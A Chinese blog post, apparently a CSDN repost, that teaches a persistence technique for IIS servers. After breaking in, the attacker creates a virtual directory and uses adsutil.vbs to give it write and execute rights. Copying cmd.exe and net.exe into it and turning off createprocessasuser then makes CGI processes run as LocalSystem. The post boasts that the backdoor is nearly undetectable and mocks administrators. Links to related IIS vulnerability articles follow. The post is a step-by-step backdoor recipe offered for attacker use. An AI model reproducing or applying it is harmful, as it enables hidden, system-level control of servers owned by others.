真正的IIS永远的后门解密

最新推荐文章于 2023-10-30 09:14:02 发布
最新推荐文章于 2023-10-30 09:14:02 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: 漏洞注释 文章标签: iis file cgi integer 服务器 c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hiwish/article/details/1755261
版权
IIS是比较流行的www服务器,设置不当漏洞就很多。入侵iis服务器后留下后门,以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听,比如有nc,ntlm,rnc等等都是以一种类telnet的方式在服务器端监听远程的连接控制。不过一个比较防范严密的www站点(他们的管理员吃了苦头后)一般通过防火墙对端口进行限制,这样除了管理员开的端口外,其他端口就不能连接了。但是80端口是不可能关闭的(如果管理员没有吃错药)。那么我们可以通过在80端口留后门,来开启永远的后门。   当IIS启动CGI应用程序时,缺省用CreateProcessAsUser API来创建该CGI的新Process,该程序的安全上下文就由启动该CGI的用户决定。一般匿名用户都映射到IUSR_computername这个账号,当然可以由管理员改为其他的用户。或者由浏览器提供一个合法的用户。两者的用户的权限都是比较低,可能都属于guest组的成员。其实我们可以修改iis开启CGI的方式,来提高权限。我们来看iis主进程本身是运行在localsystem账号下的,所以我们就可以得到最高localsystem的权限。   入侵web服务器后,一般都可以绑定一个cmd到一个端口来远程控制该服务器。这时可以有GUI的远程控制,比如3389,或者类telnet text方式的控制,比如rnc。nc肯定是可以用的,其实这也足够了。   1. telnet到服务器   2. cscript.exe adsutil.vbs enum w3svc/1/root KeyType : (STRING) "IIsWebVirtualDir" AppRoot : (STRING) "/LM/W3SVC/1/ROOT" AppFriendlyName : (STRING) "默认应用程序" AppIsolated : (INTEGER) 2 AccessRead : (BOOLEAN) True AccessWrite : (BOOLEAN) False AccessExecute : (BOOLEAN) False AccessScript : (BOOLEAN) True AccessSource : (BOOLEAN) False AccessNoRemoteRead : (BOOLEAN) False AccessNoRemoteWrite : (BOOLEAN) False AccessNoRemoteExecute : (BOOLEAN) False AccessNoRemoteScript : (BOOLEAN) False HttpErrors : (LIST) (32 Items) "400,*,FILE,C:WINNThelpiisHelpcommon400.htm" "401,1,FILE,C:WINNThelpiisHelpcommon401-1.htm" "401,2,FILE,C:WINNThelpiisHelpcommon401-2.htm" "401,3,FILE,C:WINNThelpiisHelpcommon401-3.htm" "401,4,FILE,C:WINNThelpiisHelpcommon401-4.htm" "401,5,FILE,C:WINNThelpiisHelpcommon401-5.htm" "403,1,FILE,C:WINNThelpiisHelpcommon403-1.htm" "403,2,FILE,C:WINNThelpiisHelpcommon403-2.htm" "403,3,FILE,C:WINNThelpiisHelpcommon403-3.htm" "403,4,FILE,C:WINNThelpiisHelpcommon403-4.htm" "403,5,FILE,C:WINNThelpiisHelpcommon403-5.htm" "403,6,FILE,C:WINNThelpiisHelpcommon403-6.htm" "403,7,FILE,C:WINNThelpiisHelpcommon403-7.htm" "403,8,FILE,C:WINNThelpiisHelpcommon403-8.htm" "403,9,FILE,C:WINNThelpiisHelpcommon403-9.htm" "403,10,FILE,C:WINNThelpiisHelpcommon403-10.htm" "403,11,FILE,C:WINNThelpiisHelpcommon403-11.htm" "403,12,FILE,C:WINNThelpiisHelpcommon403-12.htm" "403,13,FILE,C:WINNThelpiisHelpcommon403-13.htm" "403,15,FILE,C:WINNThelpiisHelpcommon403-15.htm" "403,16,FILE,C:WINNThelpiisHelpcommon403-16.htm" "403,17,FILE,C:WINNThelpiisHelpcommon403-17.htm" "404,*,FILE,C:WINNThelpiisHelpcommon404b.htm" "405,*,FILE,C:WINNThelpiisHelpcommon405.htm" "406,*,FILE,C:WINNThelpiisHelpcommon406.htm" "407,*,FILE,C:WINNThelpiisHelpcommon407.htm" "412,*,FILE,C:WINNThelpiisHelpcommon412.htm" "414,*,FILE,C:WINNThelpiisHelpcommon414.htm" "500,12,FILE,C:WINNThelpiisHelpcommon500-12.htm" "500,13,FILE,C:WINNThelpiisHelpcommon500-13.htm" "500,15,FILE,C:WINNThelpiisHelpcommon500-15.htm" "500,100,URL,/iisHelp/common/500-100.asp" FrontPageWeb : (BOOLEAN) True Path : (STRING) "c:inetpubwwwroot" AccessFlags : (INTEGER) 513 [/w3svc/1/root/localstart.asp] [/w3svc/1/root/_vti_pvt] [/w3svc/1/root/_vti_log] [/w3svc/1/root/_private] [/w3svc/1/root/_vti_txt] [/w3svc/1/root/_vti_script] [/w3svc/1/root/_vti_cnf] [/w3svc/1/root/_vti_bin]   不要告诉我你不知道上面的输出是什么!!!!   现在我们心里已经有底了,是不是!呵呵 管理员要倒霉了   3. mkdir c:inetpubwwwrootdir1   4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:inetpubwwwrootdir1"   这样就建好了一个虚目录:Virtual Dir1   你可以用 1 的命令看一下   5. 接下来要改变一下Virtual Dir1的属性为execute   cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" -s:   cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" -s:   现在你已经可以upload 内容到该目录,并且可以运行。你也可以把cmd.exe net.exe直接拷贝到虚拟目录的磁盘目录中。   6. 以下命令通过修改iis metabase 来迫使iis以本身的安全环境来创建新的CGI process   Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false   注释:cscript windows script host.   adsutil.vbs windows iis administration script   后面是 iis metabase path   这样的后门几乎是无法查出来的,除非把所有的虚目录察看一遍(如果管理员写好了遗书,那他就去查吧)
hiwish
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
IIS永远后门
wuhongze的专栏
01-09 1128
IIS是比较流行的www服务器,设置不当漏洞就很多。入侵iis服务器后留下后门,以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听,比如有nc,ntlm,rnc等等都是以一种类telnet的方式在服务器端监听远程的连接控制。不过一个比较防范严密的www站点(他们的管理员吃了苦头后)一般通过防火墙对端口进行限制,这样除了管理员开的端口外,其他端口就不能连接了。但是80端口是不可能关闭的(
[导入]远程分析IIS设置
weixin_34067980的博客
10-26 109
远程分析IIS设置   提起微软公司IIS web服务器的安全问题,很多人立刻就会联想到那些为人们所称颂的致命 漏洞: UNICODE , CGI 解析, .ida,idq, .Printer远程溢出等. 这些伟大的漏洞恐怕是我等scriptskidding的最爱了,利用他们可以很轻松的拿到较高的系统权限。但是这篇文章并非是讨论这些致命的漏洞的,只是比较详细的介绍了如何远程判断IIS 服务器的各...
iis常见漏洞(中间件常见漏洞)
qq_56438857的博客
08-17 8819
该漏洞的意义:1、 猜解后台地址2、 猜解敏感文件,例如备份的rar、zip、.bak、.sql文件等。3、 在某些情形下,甚至可以通过短文件名web直接下载对应的文件。该漏洞的局限性:1、 只能猜解前六位,以及扩展名的前三位。2、 名称较短的文件是没有相应的短文件名的。3、 不支持中文文件名4、 如果文件名前6位带空格,8.3格式的短文件名会补进,和真实文件名不匹配5、 需要IIS和.net两个条件都满足。...
IIS 解析漏洞复现
来日可期的博客
10-12 2950
IIS 7.0/7.5 解析漏洞,在路径的末尾添加一个/.php,页面报错的原因是这里使用的是IIS10.0 该漏洞已被修复。php解释执行是通过php解释器来决定的,这里我们使用phpstudy中的php-cgi.exe。当用户访问phpinfo.php的时候,将该文件找到交给php-cgi.exe来解释执行。修改php.ini文件中的cgi.fix.pathinfo的值为0。将phpinfo.php后缀名修改为png,重新访问页面。在指定目录下创建一个phpinfo.php文件。
Windows权限维持之IIS后门、windows隐藏技术、驱动隐藏
Longwaer
01-12 780
了解掌握Windows中权限维持小技巧,在安全应急中更好的去对后门文件进行排查。
IIS配置文件后门的方法
10-01
IIS配置文件后门的方法
利用IIS缺陷配置Asp后门
10-21
利用IIS缺陷配置Asp后门利用IIS缺陷配置Asp后门利用IIS缺陷配置Asp后门利用IIS缺陷配置Asp后门
IIS6.0真正完整安装包
01-23
IIS6.0真正完整安装包,保证不缺文件
iis6真正完全安装包
02-16
亲自安装成功,不需要I386包,所有需要的文件都是我在安装过程中一个一个的下栽以后放在本包里面的,.提示需要I386文件的时候请修改一下目录到本目录下就可以了,.
3dtiles预览IIS
07-08
IIS发布,原生Cesium加载预览3dtiles数据
IIS应用程序池标识的权限说明
偏爱mango的小姐姐的博客
08-07 3085
最近在部署项目到服务器上的时候报了一个错误,如错信息如下: 编译器错误信息: CS0016:未能写入输出文件: '*:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\Temporary ASP.NET Files\*\*.dll'--拒绝访问." 百度都说是因为权限的问题,但由于服务器已经加上权限控制,不允许添加新的用户权限,因而只能另选他法。 最终的解...
iis localsystem IIS部署站点有关经验总结
Zola的博客
10-29 2307
iis localsystem IIS部署站点有关经验总结 时间:10月31日 IIS部署站点相关经验总结 1.IIS和.net4.0安装是有先后顺序的,应该先安装.net framework 4.0,再安装IIS。如果按相反顺序安装的话,IIS中看不到4.0相关的东西,那么只能执行命令启用: C:\Windows\system32> C:\WINDOWS\Framework\v4.0...
window权限维持——iis后门
mingyqf的博客
02-18 646
原理可参考:https://www.cnblogs.com/zaqzzz/p/12942439.html 步骤可参考:https://longwaer.blog.csdn.net/article/details/122446348 web服务器上一般都 支持net 所以可以考虑利用net iis做一个后门 项目地址 https://github.com/WBGlIl/IIS_backdoor 在网站目录下新建一个bin文件夹 这个文件夹 存放dll集 把IIS_backdoor_dll.dll存放在这里面
IIS服务器IIS服务器常见漏洞
时乙的博客
11-05 4090
文件解析漏洞 1、目录解析漏洞 2、文件名解析漏洞 3、畸形解析漏洞 IIS 短文件漏洞 PUT 任意文件写入 IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。 IIS目前只适用于Windows系统,不适用于其他操作系统。 文件解析漏洞 1、目录解析漏洞 在 IIS5.x/6.0 中,默认会将**.asp(*.asa、*.cer、*.cdx )目录下的.
服务器配置篇 ━━ iis7配置php出现fastcgi的500错误,LocalSystem/LocalService/NetworkService/ApplicationPoolIdentity
暂时先用这个名字
04-23 2017
最近在IIS7上配置PHP,但总是提示500错误,以往是因为.net framework版本弄错,但这次不是
IIS短文件名漏洞修复
最新发布
生活在继续
10-30 2435
微软的URLScan工具是最适合的一个轻量级工具,关键它是免费的,而且安装、配置非常简单。安装完毕之后,在需要做URL过滤的站点的属性中,添加一个ISAPI筛选器,dll路径位于:C:WINDOWSsystem32inetsrvurlscan。CMD输入regedit回车,在注册表中找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem,将其中的 NtfsDisable8dot3NameCreation这一项的值设为 1;
查看iis进程(w3wp)所对应的程序池名称 / 端口使用情况
热门推荐
Mr蹇 的博客
03-28 1万+
有些时候,服务器上某个iis站点进程占用较多资源,且多个站点用相同的账户运行时,无法区分具体是哪个站点占用了资源, 这时我们需要根据pid来区分,如下步骤。 1、首先在任务管理器中,勾选显示PID列。 2、打开CMD,输入c:\windows\system32\inetsrv\appcmd list wp 这里需要备注: 如果上面的命令提示:ERROR ( message:WAS
IIS 配置相关
u010138098的博客
08-24 356
应用程序池的问题。把iis 应用程序池 --高级设置--启用32位应用程序 :true 把iis 应用程序池 --高级设置--进程模型--标识:LocalSystem。 网站打开正常。
IIS 漏洞总结
星落的博客
04-11 3982
目录 IIS介绍 IIS6.0 版本 目录解析漏洞 文件名解析漏洞 远程代码执行漏洞 cve_2017_7269 漏洞描述 POC 说明 漏洞利用 IIS7.5版本 IIS解析漏洞 漏洞原理 实验环境搭建 漏洞复现 IIS介绍 iis是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务 IIS6.0 版本 目录解析漏洞 对于名字为.asp后缀的文...
.net5 部署到iis,RSA解密失败可能是什么原因?
06-10
RSA解密失败可能有以下几个原因: 1. 密钥不匹配:在进行 RSA 解密时,需要使用与加密时使用的密钥相同的密钥对进行解密。如果解密时使用的密钥与加密时使用的密钥不匹配,那么就会导致解密失败。 2. 数据被篡改:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值